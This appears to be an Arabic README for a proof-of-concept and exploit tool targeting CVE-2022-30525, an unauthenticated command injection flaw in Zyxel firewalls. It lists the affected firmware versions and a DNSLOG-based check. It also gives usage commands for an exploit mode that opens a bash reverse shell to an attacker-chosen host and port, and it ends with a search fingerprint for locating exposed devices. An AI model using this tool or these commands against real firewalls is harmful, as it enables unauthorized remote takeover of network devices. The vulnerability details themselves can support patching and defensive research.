
CVE-2022-30525 Zyxel ثغرة حقن أوامر في جدار الحماية POC&EXPC
CVE-2022-30525 POC&EXP
المؤلف: 160team.west9B
يُستخدم فقط من قبل باحثي الأمن بإذن، مع الامتثال لقانون الأمن السيبراني. أي مشاكل تنشأ، تكون على مسؤوليتك الخاصة، ولا يتحمل المؤلف أي مسؤولية.
في 12 مايو 2022، أصدرت Zyxel إعلانًا أمنيًا لإصلاح ثغرة حقن الأوامر عن بُعد غير المصادق عليها (CVE-2022-30525) في أجهزة جدار الحماية الخاصة بها، بدرجة CVSS 9.8. توجد الثغرة في برنامج CGI لبعض إصدارات جدار حماية Zyxel، وتسمح بتنفيذ أوامر عشوائية على الأجهزة المتأثرة دون مصادقة.
النطاق المتأثر:
سلسلة ATP من البرامج الثابتة: 5.10-5.21 Patch 1
سلسلة VPN من البرامج الثابتة: 4.60-5.21 Patch 1
USG FLEX 100(W), 200, 500, 700: 5.00-5.21 Patch 1
USG FLEX 50(W)/USG20(W)-VPN: 5.10-5.21 Patch 1
تنفيذ الأمر لهذه الثغرة لا يعرض مخرجات، لذلك يتحقق POC عن طريق طلب واجهة DNSLOG API. إذا كان هناك طلب DNSLOG، تكون الثغرة موجودة. لمنع النتائج الإيجابية الخاطئة بسبب تأخر الشبكة، يطلب التحقق DNSLOG بتأخير 10 ثوانٍ.
usage_poc: ./cve-2022-30525 -m poc -u https://192.168.1.1/
استغلال bash shell عكسي، بعد -m exp حدد IP و منفذ VPS.
usage_exp: ./cve-2022-30525 -m exp -u https://192.168.1.1/ -lhost 192.168.1.2 -lport 1337

title="USG FLEX xx"